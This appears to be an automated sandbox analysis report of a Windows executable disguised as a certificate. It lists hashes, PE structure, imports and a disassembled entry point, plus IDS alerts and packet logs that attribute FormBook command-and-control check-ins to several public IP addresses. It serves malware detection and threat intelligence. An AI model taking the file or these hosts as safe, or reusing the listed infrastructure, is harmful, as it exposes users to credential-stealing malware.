                                                                                  Preview:.....22Y2`..S...~.DI..n@O...280QZELC5BHDJIWGFCG22Y280QZELC.BHDDV.IF.N...3t.p.-%0.2:+-;6*f &\\6F.R4z79-.+&d...g+,#W.T?2.QZELC5B1EC.j'!.zRU..XW.@..."/.P...z# .(....1=..*V*u$-.WGFCG22Yb}0Q.DMC.*..JIWGFCG2.Y09;PQELS1BHDJIWGFC.'2Y2(0QZeHC5B.DJYWGFAG24Y280QZEJC5BHDJIWgBCG02Y280QXE..5BXDJYWGFCW22I280QZE\C5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZEb7P:<DJI.HBCG"2Y2(4QZULC5BHDJIWGFCG2.Y2X0QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y280QZELC5BHDJIWGFCG22Y28

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.128379503240229
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:Certificate 11-18720.exe
                                                                                  File size:1'197'568 bytes
                                                                                  MD5:287e61624e5c839ff4b366e1969b3bce
                                                                                  SHA1:de64781dc1e8d8fa7c89c0e0e1952970efa6bafd
                                                                                  SHA256:88bd9c321e78561ad3a06e28f49adf5c09a2ad460c39c946ebffd3ec716276d3
                                                                                  SHA512:0a07311662b1b78e5030a1b3c6a5ea84ea4c5fdada5f954ecaa9d7183f3f3f103b3e4e9844344e4d87aaf24223dddb9ca9b11fa9f09178519eadaa0604007f49
                                                                                  SSDEEP:24576:gtb20pkaCqT5TBWgNQ7aVstv2/34RUf2aJabe8cXb6A:pVg5tQ7aVstv2/4RbI5
                                                                                  TLSH:3945C01263DE8361C7B25273BA267701BE7F782506B1F96B2FD4093DE920122525EB73
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                                                                  File Icon

                                                                                  Icon Hash:aaf3e3e3938382a0

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x425f74
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x673BCB9B [Mon Nov 18 23:19:55 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  call 00007FC8B4BC2EAFh
                                                                                  jmp 00007FC8B4BB5EC4h
                                                                                  int3
                                                                                  int3
                                                                                  push edi
                                                                                  push esi
                                                                                  mov esi, dword ptr [esp+10h]
                                                                                  mov ecx, dword ptr [esp+14h]
                                                                                  mov edi, dword ptr [esp+0Ch]
                                                                                  mov eax, ecx
                                                                                  mov edx, ecx
                                                                                  add eax, esi
                                                                                  cmp edi, esi
                                                                                  jbe 00007FC8B4BB604Ah
                                                                                  cmp edi, eax
                                                                                  jc 00007FC8B4BB63AEh
                                                                                  bt dword ptr [004C0158h], 01h
                                                                                  jnc 00007FC8B4BB6049h
                                                                                  rep movsb
                                                                                  jmp 00007FC8B4BB635Ch
                                                                                  cmp ecx, 00000080h
                                                                                  jc 00007FC8B4BB6214h
                                                                                  mov eax, edi
                                                                                  xor eax, esi
                                                                                  test eax, 0000000Fh
                                                                                  jne 00007FC8B4BB6050h
                                                                                  bt dword ptr [004BA370h], 01h
                                                                                  jc 00007FC8B4BB6520h
                                                                                  bt dword ptr [004C0158h], 00000000h
                                                                                  jnc 00007FC8B4BB61EDh
                                                                                  test edi, 00000003h
                                                                                  jne 00007FC8B4BB61FEh
                                                                                  test esi, 00000003h
                                                                                  jne 00007FC8B4BB61DDh
                                                                                  bt edi, 02h
                                                                                  jnc 00007FC8B4BB604Fh
                                                                                  mov eax, dword ptr [esi]
                                                                                  sub ecx, 04h
                                                                                  lea esi, dword ptr [esi+04h]
                                                                                  mov dword ptr [edi], eax
                                                                                  lea edi, dword ptr [edi+04h]
                                                                                  bt edi, 03h
                                                                                  jnc 00007FC8B4BB6053h
                                                                                  movq xmm1, qword ptr [esi]
                                                                                  sub ecx, 08h
                                                                                  lea esi, dword ptr [esi+08h]
                                                                                  movq qword ptr [edi], xmm1
                                                                                  lea edi, dword ptr [edi+08h]
                                                                                  test esi, 00000007h
                                                                                  je 00007FC8B4BB60A5h
                                                                                  bt esi, 03h
                                                                                  jnc 00007FC8B4BB60F8h
                                                                                  movdqa xmm1, dqword ptr [esi+00h]

                                                                                  Rich Headers

                                                                                  Programming Language:
                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [ASM] VS2012 UPD4 build 61030
                                                                                  • [RES] VS2012 UPD4 build 61030
                                                                                  • [LNK] VS2012 UPD4 build 61030

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5b434.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1200000x6c4c.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                  .rsrc0xc40000x5b4340x5b6002a8cf14cf679454656e75fd2473b6f14False0.9276141415868673data7.894603702155416IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0x1200000xa4740xa6000bc98f8631ef0bde830a7f83bb06ff08False0.5017884036144579data5.245426654116355IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                  Resources

                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                  RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                  RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                  RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                  RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                  RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                  RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                  RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                  RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                  RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                  RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                  RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                  RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                  RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                  RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                  RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                  RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                  RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                  RT_RCDATA0xcc7b80x52739data1.0003286736685015
                                                                                  RT_GROUP_ICON0x11eef40x76dataEnglishGreat Britain0.6610169491525424
                                                                                  RT_GROUP_ICON0x11ef6c0x14dataEnglishGreat Britain1.25
                                                                                  RT_GROUP_ICON0x11ef800x14dataEnglishGreat Britain1.15
                                                                                  RT_GROUP_ICON0x11ef940x14dataEnglishGreat Britain1.25
                                                                                  RT_VERSION0x11efa80xdcdataEnglishGreat Britain0.6181818181818182
                                                                                  RT_MANIFEST0x11f0840x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                  Imports

                                                                                  DLLImport
                                                                                  WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                  VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                  WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                  COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                  MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                  WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                  PSAPI.DLLGetProcessMemoryInfo
                                                                                  IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                  USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                  UxTheme.dllIsThemeActive
                                                                                  KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                  USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                  GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                  COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                  ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                  OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                  Possible Origin

                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                  EnglishGreat Britain

                                                                                  Network Behavior

                                                                                  Suricata IDS Alerts

                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                  2024-11-25T18:11:47.039456+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449736154.215.72.11080TCP
                                                                                  2024-11-25T18:12:21.188999+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449757116.50.37.24480TCP
                                                                                  2024-11-25T18:13:44.783297+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44981185.159.66.9380TCP
                                                                                  2024-11-25T18:13:59.633445+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44995791.195.240.9480TCP
                                                                                  2024-11-25T18:14:23.456951+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45001366.29.149.4680TCP
                                                                                  2024-11-25T18:14:43.704610+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450022195.110.124.13380TCP
                                                                                  2024-11-25T18:15:15.646956+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450026217.196.55.20280TCP

                                                                                  Network Port Distribution

                                                                                  TCP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Nov 25, 2024 18:11:45.334497929 CET4973680192.168.2.4154.215.72.110
                                                                                  Nov 25, 2024 18:11:45.456644058 CET8049736154.215.72.110192.168.2.4
                                                                                  Nov 25, 2024 18:11:45.456826925 CET4973680192.168.2.4154.215.72.110
                                                                                  Nov 25, 2024 18:11:45.475092888 CET4973680192.168.2.4154.215.72.110
                                                                                  Nov 25, 2024 18:11:45.601325989 CET8049736154.215.72.110192.168.2.4
                                                                                  Nov 25, 2024 18:11:47.039231062 CET8049736154.215.72.110192.168.2.4
                                                                                  Nov 25, 2024 18:11:47.039338112 CET8049736154.215.72.110192.168.2.4
                                                                                  Nov 25, 2024 18:11:47.039455891 CET4973680192.168.2.4154.215.72.110
                                                                                  Nov 25, 2024 18:11:47.042996883 CET4973680192.168.2.4154.215.72.110
                                                                                  Nov 25, 2024 18:11:47.163583994 CET8049736154.215.72.110192.168.2.4
                                                                                  Nov 25, 2024 18:12:11.384831905 CET4973780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:11.507879019 CET8049737116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:11.508125067 CET4973780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:11.509748936 CET4973780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:11.630062103 CET8049737116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:13.023228884 CET4973780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:13.098665953 CET8049737116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:13.098747015 CET4973780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:13.099011898 CET8049737116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:13.099067926 CET4973780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:13.150672913 CET8049737116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:13.150782108 CET4973780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:14.041429996 CET4974080192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:14.161865950 CET8049740116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:14.161945105 CET4974080192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:14.163758039 CET4974080192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:14.294800997 CET8049740116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:15.679388046 CET4974080192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:15.800828934 CET8049740116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:15.800898075 CET4974080192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:16.698426008 CET4974880192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:16.948223114 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:16.952250004 CET4974880192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:16.954519033 CET4974880192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:17.074995995 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.075138092 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.075149059 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.075161934 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.075171947 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.097595930 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.097783089 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.151922941 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:17.168643951 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:18.460704088 CET4974880192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:18.516350985 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:18.516396046 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:18.516485929 CET4974880192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:18.516485929 CET4974880192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:18.586672068 CET8049748116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:18.586925983 CET4974880192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:19.480281115 CET4975780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:19.606362104 CET8049757116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:19.607625961 CET4975780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:19.609487057 CET4975780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:19.735285997 CET8049757116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:21.188296080 CET8049757116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:21.188900948 CET8049757116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:21.188998938 CET4975780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:21.190941095 CET4975780192.168.2.4116.50.37.244
                                                                                  Nov 25, 2024 18:12:21.315356016 CET8049757116.50.37.244192.168.2.4
                                                                                  Nov 25, 2024 18:12:35.265610933 CET4979180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:35.387031078 CET804979185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:35.387162924 CET4979180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:35.389682055 CET4979180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:35.510571957 CET804979185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:36.898283958 CET4979180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:37.019103050 CET804979185.159.66.93192.168.2.4
                                                                                  Nov 25, 2024 18:12:37.022361994 CET4979180192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:37.923394918 CET4979880192.168.2.485.159.66.93
                                                                                  Nov 25, 2024 18:12:38.044192076 CET804979885.159.66.93192.168.2.4
